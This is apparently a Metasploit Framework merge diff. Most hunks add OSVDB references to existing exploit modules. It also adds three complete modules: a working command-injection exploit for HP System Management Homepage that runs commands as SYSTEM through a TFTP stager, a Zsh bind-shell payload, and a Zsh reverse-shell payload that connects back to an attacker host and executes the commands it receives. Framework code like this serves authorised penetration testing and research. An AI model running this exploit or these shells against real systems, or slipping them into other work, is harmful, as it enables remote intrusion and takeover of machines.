Merge branch 'master' of https://github.com/rapid7/metasploit-framework

modules/exploits/multi/browser/java_jre17_jmxbean.rb

@@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'    =>
 				[
 					[ 'CVE', '2013-0422' ],
+					[ 'OSVDB', '89059' ],
 					[ 'US-CERT-VU', '625617' ],
 					[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
 					[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],

modules/exploits/multi/http/familycms_less_exec.rb

@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
+					[ 'OSVDB', '77492' ],
 					[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
 					[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
 					[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],

modules/exploits/multi/http/freenas_exec_raw.rb

@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
+					[ 'OSVDB', '94441' ],
+					[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
 				],
 			'Payload'	=>
 				{

modules/exploits/multi/http/gitorious_graph.rb

@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'     =>
 				[
-					[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
+					[ 'OSVDB', '78480' ],
+					[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
 				],
 			'Privileged'     => false,
 			'Payload'        =>

modules/exploits/multi/http/jboss_bshdeployer.rb

@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'	=>
 				[
 					[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
+					[ 'OSVDB', '64171' ],
 					[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
 					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
 				],

modules/exploits/multi/http/jboss_deploymentfilerepository.rb

@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'References'  =>
 				[
 					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
+					[ 'OSVDB', '64171' ],
 					[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
 					[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
 				],

modules/exploits/multi/http/mobilecartly_upload_exec.rb

@@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					['EDB', '20422'],
+					[ 'OSVDB', '85509' ],
-					['BID', '55399']
+					[ 'EDB', '20422 '],
+					[ 'BID', '55399 ']
 				],
 			'Payload'        =>
 				{

modules/exploits/multi/http/movabletype_upgrade_exec.rb

@@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
+					[ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
-					['CVE', '2013-0209'],
+					[ 'CVE', '2013-0209' ],
-					['URL', 'http://www.sec-1.com/blog/?p=402'],
+					[ 'OSVDB', '89322' ],
-					['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
+					[ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
+					[ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
 				],
 			'Arch'		 => ARCH_CMD,
 			'Payload'	 =>

modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb

@@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			},
 			'Author'         => [ 'hdm' ],
 			'License'        => MSF_LICENSE,
-			'References'     => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
+			'References'     =>
+				[
+					[ 'CVE', '2012-5159' ],
+					[ 'OSVDB', '85739' ],
+					[ 'EDB', '21834' ],
+					[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
+				],
 			'Privileged'     => false,
 			'Payload'        =>
 				{

modules/exploits/multi/http/rails_xml_yaml_code_exec.rb

@@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'References'  =>
 				[
-					['CVE', '2013-0156'],
+					[ 'CVE', '2013-0156' ],
-					['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
+					[ 'OSVDB', '89026' ],
+					[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
 				],
 			'Platform'       => 'ruby',
 			'Arch'           => ARCH_RUBY,

modules/exploits/multi/http/testlink_upload_exec.rb

@@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
+					[ 'OSVDB', '85446' ],
-					#['OSVDB', ''],
+					[ 'EDB',   '20500' ],
-					#['EDB',   ''],
+					[ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
 				],
 			'Payload'        =>
 				{

modules/exploits/osx/browser/safari_file_policy.rb

@@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'References'     =>
 				[
-					['CVE', '2011-3230'],
+					[ 'CVE', '2011-3230' ],
-					['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
+					[ 'OSVDB', '76389' ],
-					['URL', 'http://support.apple.com/kb/HT5000']
+					[ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
+					[ 'URL', 'http://support.apple.com/kb/HT5000' ]
 				],
 			'Payload'        =>
 				{

modules/exploits/osx/local/setuid_tunnelblick.rb

@@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
 				'References'     =>
 					[
 						[ 'CVE', '2012-3485' ],
+						[ 'OSVDB', '84706' ],
 						[ 'EDB', '20443' ],
 						[ 'URL', 'http://blog.zx2c4.com/791' ]
 					],

modules/exploits/windows/http/hp_sys_mgmt_exec.rb

@@ -0,0 +1,178 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::CmdStagerTFTP
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info={})
+		super(update_info(info,
+			'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
+			'Description'    => %q{
+				This module exploits a vulnerability found in HP System Management Homepage.  By
+				supplying a specially crafted HTTP request, it is possible to control the
+				'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
+				which will be used in a exec() function.  This results in arbitrary code execution
+				under the context of SYSTEM.  Please note: In order for the exploit to work, the
+				victim must enable the 'tftp' command, which is the case by default for systems
+				such as Windows XP, 2003, etc.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Markus Wulftange',
+					'sinn3r'  #Metasploit
+				],
+			'References'     =>
+				[
+					['CVE', '2013-3576'],
+					['OSVDB', '94191'],
+					['US-CERT-VU', '735364']
+				],
+			'Payload'        =>
+				{
+					'BadChars' => "\x00"
+				},
+			'DefaultOptions' =>
+				{
+					'SSL' => true
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows', {}],
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => "Jun 11 2013",
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				Opt::RPORT(2381),
+				# USERNAME/PASS may not be necessary, because the anonymous access is possible
+				OptString.new("USERNAME", [false, 'The username to authenticate as']),
+				OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+			], self.class)
+	end
+
+
+	def peer
+		"#{rhost}:#{rport}"
+	end
+
+
+	def check
+		cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			cookie = login
+			if cookie.empty?
+				print_error("#{peer} - Login failed")
+				return Exploit::CheckCode::Safe
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
+		sig = Rex::Text.rand_text_alpha(10)
+		cmd = Rex::Text.uri_encode("echo #{sig}")
+		uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
+
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
+		res = send_request_raw(req_opts)
+		if not res
+			print_error("#{peer} - Connection timed out")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
+			return Exploit::CheckCode::Vulnerable
+		end
+
+		Exploit::CheckCode::Safe
+	end
+
+
+	def login
+		username = datastore['USERNAME']
+		password = datastore['PASSWORD']
+
+		cookie = ''
+
+		res = send_request_cgi({
+			'method' => 'POST',
+			'uri'    => '/proxy/ssllogin',
+			'vars_post' => {
+				'redirecturl'         => '',
+				'redirectquerystring' => '',
+				'user'                => username,
+				'password'            => password
+			}
+		})
+
+		if not res
+			fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
+		end
+
+		# CpqElm-Login: success
+		if res.headers['CpqElm-Login'].to_s =~ /success/
+			cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+		end
+
+		cookie
+	end
+
+
+	def setup_stager
+		execute_cmdstager({ :temp => '.'})
+	end
+
+
+	def execute_command(cmd, opts={})
+		# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
+		uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
+
+		req_opts = {}
+		req_opts['uri'] = uri
+		if not @cookie.empty?
+			browser_chk = 'HPSMH-browser-check=done for this session'
+			curl_loc    = "curlocation-#{datastore['USERNAME']}="
+			req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+		end
+
+		print_status("#{peer} - Executing: #{cmd}")
+		res = send_request_raw(req_opts)
+	end
+
+
+	def exploit
+		@cookie = ''
+
+		if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
+			@cookie = login
+			if @cookie.empty?
+				fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
+			else
+				print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+			end
+		end
+
+		@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
+		setup_stager
+	end
+end

modules/payloads/singles/cmd/unix/bind_zsh.rb

@@ -0,0 +1,62 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit4
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Bind TCP (via Zsh)',
+			'Description'   => %q{
+				Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
+				often available, please be aware it isn't usually installed by default.
+			},
+			'Author'        =>
+				[
+					'Doug Prostko <dougtko[at]gmail.com>'
+				],
+			'License'       => MSF_LICENSE,
+			'Platform'      => 'unix',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'cmd',
+			'RequiredCmd'   => 'zsh',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = "zmodload zsh/net/tcp;"
+		cmd << "ztcp -l #{datastore['LPORT']};"
+		cmd << "ztcp -a $REPLY;"
+		cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
+		cmd << "ztcp -c"
+		cmd
+	end
+end

modules/payloads/singles/cmd/unix/reverse_zsh.rb

@@ -0,0 +1,48 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'        => 'Unix Command Shell, Reverse TCP (via Zsh)',
+			'Description' => %q{
+				Connect back and create a command shell via Zsh.  Note: Although Zsh is often
+				available, please be aware it isn't usually installed by default.
+			},
+			'Author'      => 'Doug Prostko <dougtko[at]gmail.com>',
+			'License'     => MSF_LICENSE,
+			'Platform'    => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Handler'     => Msf::Handler::ReverseTcp,
+			'Session'     => Msf::Sessions::CommandShell,
+			'PayloadType' => 'cmd',
+			'RequiredCmd' => 'zsh',
+			'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+		))
+	end
+
+	def generate
+		return super + command_string
+	end
+
+	def command_string
+		cmd = "zmodload zsh/net/tcp;"
+		cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
+		cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
+		cmd << "ztcp -c"
+		cmd
+	end
+end